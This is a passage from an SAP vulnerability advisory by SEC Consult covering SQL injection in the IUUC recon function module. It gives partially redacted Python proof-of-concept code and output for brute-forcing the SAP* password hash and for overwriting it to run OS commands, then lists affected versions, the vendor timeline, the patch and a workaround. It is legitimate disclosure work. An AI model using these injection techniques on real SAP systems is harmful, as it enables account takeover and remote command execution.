MANDT='000'))")<br /><br /> [ --- PoC partially removed --- ]<br /><br /> if(result['ET_COUNT'][0]['RECCNT'] != 0):<br /> final_str += c<br /> print("{x-issha, 1024}" + final_str,end='\r')<br /> print ("\n")<br />* ************************************************************************** *<br /><br />Running the code produces the following output:<br /><br />$> poc_iuuc_remote.py<br />Brute Forcing SAP* password hash in client 000...<br />{x-issha, 1024}DRM3SNvfwWWsDf71QYyx+5L0AkN3l0nyKgPjvlBsPqE=<br /><br /><br />Example B: Arbitrary Write<br /><br />The next proof of concept demonstrates arbitrary write to the database by using<br />stacked queries. The following payload inserts the password hash corresponding<br />to the plaintext password "Test123" into the SAP* users of all clients and<br />then authenticates with the user SAP* on the other client 000. Afterwards, the<br />OS command "ip addr" is executed:<br /><br />* ************************************************************************** *<br />#!/usr/bin/env python3<br />from pyrfc import Connection<br /><br />def read_ABAP_Report():<br /> with open('X:\\test.abap') as file:<br /> content = file.readlines()<br /> content = [x.strip() for x in content]<br /> return content<br /><br />if __name__ == '__main__':<br /> final_str = ""<br /> conn = Connection(ashost="XX.XX.XX.XX", sysnr="00", client= "001",<br /> user= "Peter", passwd="Sap123456", lang='EN')<br /><br /> where_clause = (<br /> "1 = 1 ); UPDATE USR02 SET PWDSALTEDHASH = "<br /> "'{x-issha, 1024}voJRVT/rrJ31pxfmhb/zaBqhXA81CYKSnylMlKr/CkE=' "<br /> "WHERE BNAME = 'SAP*'; COMMIT WORK; --")<br /><br /> [ --- PoC partially removed --- ]<br /><br /> conn2 = Connection(ashost="XX.XX.XX.XX", sysnr="00", client= "000",<br /> user= "SAP*", passwd="Test123", lang='EN')<br /><br /> inject = ['REPORT Z_TEST213.'<br /> 'DATA(c) = \'ip addr\'.',<br /> 'DATA t TYPE TABLE OF char255.',<br /> 'DATA l(250) TYPE c.',<br /> 'CALL \'SYSTEM\' ID \'COMMAND\' FIELD c ID \'TAB\' FIELD t.',<br /> 'LOOP AT t INTO l.',<br /> 'WRITE: / l.',<br /> 'ENDLOOP.']<br /><br /> params = {'PROGRAM':inject}<br /> result = conn2.call('/SAPDS/RFC_ABAP_INSTALL_RUN', **params)<br /> for x in result['WRITES']:<br /> print(x['ZEILE'])<br />* ************************************************************************** *<br /><br />Running the code produces the following output:<br /><br />$> .\poc_iuuc_remote2.py<br />1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group<br /> default ql<br /> link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00<br /> inet 127.0.0.1/8 scope host lo<br /> valid_lft forever preferred_lft forever<br /> inet6 ::1/128 scope host<br /> valid_lft forever preferred_lft forever<br />2: enp0s3: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state<br /> DOWN<br /> link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff<br />3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state U<br /> P grou<br /> link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff<br /> inet XX.XX.XX.XX/24 brd XX.XX.XX.255 scope global noprefixroute enp0s8<br /> valid_lft forever preferred_lft forever<br /> inet6 fe80::a00:27ff:fec3:fa40/64 scope link<br /> valid_lft forever preferred_lft forever<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />This vulnerability has been tested on SAP Netweaver 752 SP-LEVEL 0004<br />DMIS Release 2011_1_731 SP-Level 0016 SP SAPK-11616INDMIS.<br /><br />According to the vendor, the following products / versions are affected:<br />* SAPSCORE 125 < SAPK-12502INSAPSCORE<br />* S4CORE 105 < SAPK-10503INS4CORE<br />* S4CORE 104 < SAPK-10405INS4CORE<br />* S4CORE 103 < SAPK-10307INS4CORE<br />* S4CORE 102 < SAPK-10209INS4CORE<br />* S4CORE 101 < SAPK-10111INS4CORE<br />* S4CORE 100<br />* DMIS 2018_1_752 < SAPK-20106INDMIS<br />* DMIS 2020 < SAPK-20202INDMIS<br />* DMIS 2011_1_700 < SAPK-11321INDMIS<br />* DMIS 2011_1_710 < SAPK-11421INDMIS<br />* DMIS 2011_1_730 < SAPK-11521INDMIS<br />* DMIS 2011_1_731 < SAPK-11621INDMIS<br />* DMIS 2011_1_620 < SAPK-11121INDMIS<br />* DMIS 2011_1_640 < SAPK-11221INDMIS<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-07-08: Contacting SAP Product Security Response Team through Web Portal<br /> https://www.sap.com/about/trust-center/security/incident-management.html<br /> ID SR-21-00009 has been assigned<br />2021-07-19: Vendor confirms vulnerability<br />2021-08-10: SNote 3078312 with patch released<br />2021-11-17: SEC Consult sends final advisory to vendor and informs about release<br /> date<br />2021-11-18: SAP requests to obfuscate or remove PoC<br />2021-12-14: Coordinated release of security advisory<br /><br /><br />Solution:<br />---------<br />SEC Consult advises all SAP® customers to implement SAP Security Note<br />3078312 immediately. Note that Security Note 3078312 contains no automatic<br />correction instructions for customers who run systems with DMIS versions or<br />Support Package levels lower than DMIS 2011 SP10 (2015). Please refer to the<br />section workaround.<br /><br /><br />Workaround:<br />-----------<br />In lower SP levels, the correction can be applied manually by modifying<br />function module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement<br />directly after the authorization check:<br /><br />ASSERT it_where_clause[] IS INITIAL.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Raschin Tavakoli / @2021<br /><br /><br /></code></pre>